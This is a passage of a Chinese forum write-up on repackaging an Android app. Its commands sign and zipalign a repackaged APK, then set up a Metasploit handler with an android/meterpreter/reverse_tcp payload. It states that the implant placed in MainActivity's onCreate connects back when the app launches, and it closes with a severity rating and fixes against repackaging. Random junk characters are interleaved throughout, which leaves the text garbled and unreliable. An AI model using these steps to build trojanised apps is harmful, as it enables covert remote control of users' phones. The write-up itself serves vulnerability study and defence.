; H( j3 }% E4 i2 K # L' W/ w1 k. k" D+ T2 p( m& p4 y keytool -printcert -jarfile repackaged.apk + d. N3 z [* d- F% ~: z1 b. ?) E5 B$ D( a7 f6 ?

2 P/ i# s/ M3 B" G9 ^+ l. s- A* T 3 B9 V! O! A$ s 对齐 3 ?5 Q( @7 O+ f) A$ C 3 r7 i& ^5 n( t; |5 b

) ~6 V2 }( `- _: V. A& S | & R# m' |& _& a- o! h- {9 o5 S 字节对齐优化 9 I, \& [* U1 O' _1 P, ~6 Z8 Z h ^0 s: K

: W2 O: \' |* J0 x" X" X 8 { `. \7 F! V) Y zipalign -v 4 repackaged.apk final.apk 9 ]' M6 X4 t* s' L: X 5 D D7 q0 Q7 S3 H# J

- f3 @4 b- V& X5 U O3 b" ~8 b , ]; h ~1 u+ J( o$ Z. Y0 a6 i 检查是否对齐 ( ~( u, f# y. H 7 W9 P( L% b) F! s

! ?! k V4 G) Y. I3 d% S $ L) e# _1 ~( F9 A- [8 C zipalign -c -v 4 final.apk : J1 v& l( q q, G8 D6 S # Y* N1 n/ a" R( d! ?3 e, e. d" J

# E& U4 p {* h' o* o3 h % m5 O, A o. N; g+ S 注：zipalign可以在V1签名后执行，但zipalign不能在V2签名后执行,只能在V2签名之前执行 , E# ?" k: j4 n( v6 `2 q* s! m9 P8 p7 a0 l Y

. C6 `& R% g# R8 A! j0 x( t + o; j$ Z) X0 c1 ]- f' h 启动Metasploit控制台，配置参数等待上线 6 i( s0 h. K4 F5 w5 X 1 s4 g* b2 [/ M! v1 |

. m6 @. L9 v8 u* d ) {& J1 y1 A, Q( Y" H8 t4 T 在终端依次输入如下命令 , s% }% F: A& a. d8 c8 n0 M 1 x+ G! p9 V& D) S6 X

$ \! `+ o0 T- D! r/ D( U ; \3 t0 @ |: d3 I msfconsole ! s/ T0 R4 `9 s - q! h$ B$ t, ]. G* ^. h; j( n

" z Y8 K$ E7 {1 F- l+ ~ 1 y8 y% k* o/ u$ W use exploit/multi/handler ) U& Z9 b# e7 ^, o ) S0 w# i# U/ `% v

' n0 q, r' d% [) s$ S& { 1 ]8 o1 F0 e! H. w: y- q set PAYLOAD android/meterpreter/reverse_tcp / D" O+ Z. {7 g+ v& S. A 8 {. J! d: q( `, n, |; F% a

6 W3 W- X3 C& }9 [8 q5 o( } {! i. N9 _ u: E set LHOST 192.xxx.xx.xx % z8 X6 f9 C1 B! g- b/ ]2 e 4 u0 h' ~6 [" O9 ~* K4 }# I0 K

! O4 m$ X2 H; D9 j/ l& J d _5 Y1 a2 m* S% N set LPORT 4444 # G n+ d; F( L- z* e 3 o2 h [$ Q4 u q

8 h0 {" b7 M8 k2 x# S# }6 |+ e+ Y" y4 z1 Z+ m exploit # x4 H6 p; [- c1 x: ~ 2 ~ \2 C( h7 u- `8 n E

7 u" Z+ {$ e$ W 7 y$ n5 Q0 |5 {; l4 l 之前我们把入口放在 MainActivity 的 onCreate 方法中，当启动目标应用进入该界面，就会连接成功，如下图： : c8 s( U- a" x& ^# K6 O+ o' q6 L * h& g0 N6 G" T; B/ l, t0 f

* p" q8 Q- w/ ]' D5 U' u# R0 O0 c/ T 漏洞危害：中 # P$ q; q3 S8 q- F( ?, Z & y. R. ~, m. b0 U N! g

$ F7 [( r8 g' b7 m, F0 J# a+ V, E" G8 a' B: I . M( v2 \( \| x5 W0 R8 M6 W4 ^; a' N- n. V0 V 严重程度 & }; K* \|% L; g4 b0 y+ X - j! U1 d$ m" N : \|, D# D8 _$ V8 [! G : x1 A+ z- [$ h3 c	+ C; ?/ K7 r3 }- t8 m5 [0 A - K, Y/ s0 y4 K( ?" w# j; m . k3 X, J: h: m" x6 b . S* X3 O a9 X& V3 @7 Y) x* s 高 : A/ l1 Z6 B; b' t ~ @4 C, K 6 `* v4 g( z0 D 0 i Q( l# U; i6 Y3 Y/ v; a ; B& @0 T L+ [3 X	; \|& k6 o* ^/ v' z ! @+ h* V' z# x: Q: g 4 b- e8 Y- V/ U- J6 ?$ [5 q $ U8 E" T8 @( g& j7 \|& @; i9 G ■ 6 x: E* g1 H: T2 r# e, H5 R * Z* v+ Q8 a d G5 B+ l % g. {$ @$ s1 r( Z$ S5 I2 k2 \* Z : a- g- j0 p5 J, Q5 q6 ^' y	* u) k( K R+ I 0 j1 A1 R4 C/ P; E8 O1 f 2 Z2 d$ P- g. Z+ F# s+ N7 d) O. j ) H& l8 q( X$ u3 L 中 * O4 j. i" u. x4 [ _& q & H$ s8 h6 b4 b7 f M 9 y l: ^' a# Y! z' ~# u) S 9 `2 r7 Z, z/ n5 P2 M	/ Y0 c, G& ^) j! G. ]) f+ n 6 y) r ?% u9 B: R: u 9 l" u" M( r3 N* Q$ I 7 A7 S5 k; B1 S8 C- a0 W6 r ' X! B& P- r1 E; Y* a+ R4 I' m6 T% l , Z V$ b0 b. {% F / y( \|( k, e/ m- h . Y" R a* S6 N6 h) g / K3 n1 u9 X3 V& u4 H6 u7 P8 r" U0 L7 L4 z. l# h" @	. \2 M7 e0 h, E" X! h5 m ' L9 q8 ~9 h* P9 U" s / ]4 \|0 f7 p) B6 [/ B6 n# K 1 `, N5 O4 q' C; _ 低 * Y' G- t! }4 g' W- X& S5 m! f/ t( k, f; l$ R. b* B: f+ I 8 ^* X" c2 ~0 {. W" G4 e) \& h : T: y7 D% o3 }+ g% c$ K5 C	4 `7 N: z" }1 _+ `9 m- Z / \! M h& [2 t. \2 V . t. W% v2 m; @/ C* } 5 t: O0 d- n( U- Y+ G3 x7 B + R/ s/ x# }; {" I. A. {# c% q* ] I 9 S7 X6 S C) k5 ^# S- m ' ?6 m" L, L5 C7 \|; P $ n" ?2 }/ J! }7 {: M/ e$ h7 E9 E4 a

1 }3 \% h }5 u- j/ |; X" f% e* x, {1 X 4 r! p. d- e1 ~0 @. u* z' B& k# _: ] $ e" ~. v! s# q F 5 E( ^) e4 V' H: j- h8 O

1 s- a7 y" _% i* N& d 3 }9 q- \1 r8 F5 u 修复方法： - d9 K; `: J) A1 \& }; r- ?2 f% B/ s& Y2 `9 r5 [/ g; `; Q

9 y( f4 `6 }1 X S3 M, P 4 W8 n$ P. J4 @' F, `) | P 1.在 APP 启动时应做签名校验防止二次打包。
0 @/ L; t7 b& P/ O8 D' n+ a . h( P W+ W2 k9 W4 S9 ` g' y5 q 2.建议采用客户端、通信和服务器端联动防御方案进行安全防御。 7 {. f& u& V t3 Q! U/ c- p, C5 b u. C$ m6 G. J3 m

' Z+ J$ m/ c7 N7 h' Z' C) M0 `, z$ s 6 B/ I# y9 V/ u0 G; o + {4 j" {. i7 t6 T3 N$ b* c# C0 I# {4 x- u2 ]2 w6 N, v! K7 O3 z( @

9 V0 V9 d @! @- i# c) A' g7 _ $ R/ l/ ?$ r+ d" |
, m, {: S' E1 T6 f2 m + k& A% e" c3 f

		自动登录	找回密码
密码			立即注册